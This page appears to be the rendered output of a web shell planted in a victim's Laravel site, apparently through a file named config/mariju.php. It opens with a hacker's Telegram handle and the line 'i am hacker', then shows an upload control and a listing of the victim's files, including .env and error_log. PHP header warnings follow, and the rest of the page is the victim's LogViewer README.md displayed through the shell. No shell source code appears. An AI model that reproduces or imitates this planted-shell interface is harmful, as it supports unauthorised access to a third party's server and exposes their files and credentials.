telegram : @iamdarkcomedy i am hacker

path :/home/bisorgosof24/public_html/Backup23122024

upload file:

List of files:

name file size edit permission action
.env2733 KBDecember 22 2024 06:20:070644
404.html58370 KBNovember 20 2024 15:32:220644
502.html58368 KBNovember 20 2024 15:32:220644
Modules-December 11 2024 21:02:560755
README.md4158 KBFebruary 14 2023 12:31:560644
app-December 11 2024 17:57:480755
artisan1686 KBFebruary 14 2023 12:31:560644
bootstrap-December 11 2024 20:23:360755
composer.json3761 KBDecember 11 2024 22:15:000644
composer.lock512048 KBDecember 11 2024 22:13:280644
config-June 15 2025 02:09:360755
database-December 05 2024 20:18:120755
dfsdf dfds fd fds findex.html1420 KBNovember 20 2024 15:32:240644
error_log15309296 KBJuly 18 2025 17:02:340644
firoz-December 23 2024 13:24:460755
index.php1667 KBDecember 14 2024 05:20:360644
lang-December 11 2024 21:02:480755
modules_statuses.json472 KBNovember 20 2024 15:32:240644
mpos-March 31 2025 02:36:310755
package.json226 KBFebruary 14 2023 12:31:560644
phpunit.xml1146 KBFebruary 14 2023 12:31:560644
public-March 31 2025 02:36:310755
resources-December 11 2024 21:10:220755
routes-June 15 2025 02:09:310755
storage-December 11 2024 21:12:440755
tests-December 05 2024 20:18:120755
vendor-December 11 2024 22:13:300755
vite.config.js263 KBFebruary 14 2023 12:31:560644

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 227

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 228

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 229

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 230
# LogViewer [![Packagist License][badge_license]](LICENSE.md) [![For Laravel][badge_laravel]][link-github-repo] [![Github Workflow Status][badge_build]][link-github-status] [![Coverage Status][badge_coverage]][link-scrutinizer] [![Scrutinizer Code Quality][badge_quality]][link-scrutinizer] [![SensioLabs Insight][badge_insight]][link-insight] [![Github Issues][badge_issues]][link-github-issues] [![Packagist][badge_package]][link-packagist] [![Packagist Release][badge_release]][link-packagist] [![Packagist Downloads][badge_downloads]][link-packagist] *By [ARCANEDEV©](http://www.arcanedev.net/)* This package allows you to manage and keep track of each one of your log files. > **NOTE: You can also use LogViewer as an API.** Official documentation for LogViewer can be found at the [_docs folder](_docs/1.Installation-and-Setup.md). Feel free to check out the [releases](https://github.com/ARCANEDEV/LogViewer/releases), [license](LICENSE.md), and [contribution guidelines](CONTRIBUTING.md). ## Features - A great Log viewer API. - Laravel `5.x` to `10.x` are supported. - Ready to use (Views, Routes, controllers … Out of the box) [Note: No need to publish assets] - View, paginate, filter, download and delete logs. - Load a custom logs storage path. - Localized log levels. - Logs menu/tree generator. - Grouped logs by dates and levels. - Customized log levels icons (font awesome by default). - Works great with big logs !! - Well documented package (IDE Friendly). - Well tested (100% code coverage with maximum code quality). ## Table of contents 1. [Installation and Setup](_docs/1.Installation-and-Setup.md) 2. [Configuration](_docs/2.Configuration.md) 3. [Usage](_docs/3.Usage.md) ### Supported localizations > Dear artisans, i'm counting on you to help me out to add more translations ( ^_^)b | Local | Language | |---------|-----------------------| | `ar` | Arabic | | `bg` | Bulgarian | | `bn` | Bengali | | `de` | German | | `en` | English | | `es` | Spanish | | `et` | Estonian | | `fa` | Farsi | | `fr` | French | | `he` | Hebrew | | `hu` | Hungarian | | `hy` | Armenian | | `id` | Indonesian | | `it` | Italian | | `ja` | Japanese | | `ko` | Korean | | `ms` | Malay | | `nl` | Dutch | | `pl` | Polish | | `pt-BR` | Brazilian Portuguese | | `ro` | Romanian | | `ru` | Russian | | `si` | Sinhalese | | `sv` | Swedish | | `th` | Thai | | `tr` | Turkish | | `uz` | Uzbek | | `uk` | Ukrainian | | `zh` | Chinese (Simplified) | | `zh-TW` | Chinese (Traditional) | ## Contribution Any ideas are welcome. Feel free to submit any issues or pull requests, please check the [contribution guidelines](CONTRIBUTING.md). ## Security If you discover any security related issues, please email [email protected] instead of using the issue tracker. ## Credits - [ARCANEDEV][link-author] - [All Contributors][link-contributors] ## PREVIEW ![Dashboard](https://raw.githubusercontent.com/ARCANEDEV/LogViewer/master/_screenshots/1-dashboard.jpg) ![Logs list](https://raw.githubusercontent.com/ARCANEDEV/LogViewer/master/_screenshots/2-logs-list.jpg) ![Single log](https://raw.githubusercontent.com/ARCANEDEV/LogViewer/master/_screenshots/3-single-log.jpg) [badge_laravel]: https://img.shields.io/badge/Laravel-5.x%20to%2010.x-orange.svg?style=flat-square [badge_license]: https://img.shields.io/packagist/l/arcanedev/log-viewer.svg?style=flat-square [badge_build]: https://img.shields.io/github/workflow/status/ARCANEDEV/LogViewer/run-tests?style=flat-square [badge_coverage]: https://img.shields.io/scrutinizer/coverage/g/ARCANEDEV/LogViewer.svg?style=flat-square [badge_quality]: https://img.shields.io/scrutinizer/g/ARCANEDEV/LogViewer.svg?style=flat-square [badge_insight]: https://img.shields.io/sensiolabs/i/d6b4587a-e00d-4dac-98db-f979731fdc4d.svg?style=flat-square [badge_issues]: https://img.shields.io/github/issues/ARCANEDEV/LogViewer.svg?style=flat-square [badge_package]: https://img.shields.io/badge/package-arcanedev/log--viewer-blue.svg?style=flat-square [badge_release]: https://img.shields.io/packagist/v/arcanedev/log-viewer.svg?style=flat-square [badge_downloads]: https://img.shields.io/packagist/dt/arcanedev/log-viewer.svg?style=flat-square [link-author]: https://github.com/arcanedev-maroc [link-github-status]: https://github.com/ARCANEDEV/LogViewer/actions [link-github-repo]: https://github.com/ARCANEDEV/LogViewer [link-github-issues]: https://github.com/ARCANEDEV/LogViewer/issues [link-contributors]: https://github.com/ARCANEDEV/LogViewer/graphs/contributors [link-packagist]: https://packagist.org/packages/arcanedev/log-viewer [link-scrutinizer]: https://scrutinizer-ci.com/g/ARCANEDEV/LogViewer/?branch=master [link-insight]: https://insight.sensiolabs.com/projects/d6b4587a-e00d-4dac-98db-f979731fdc4d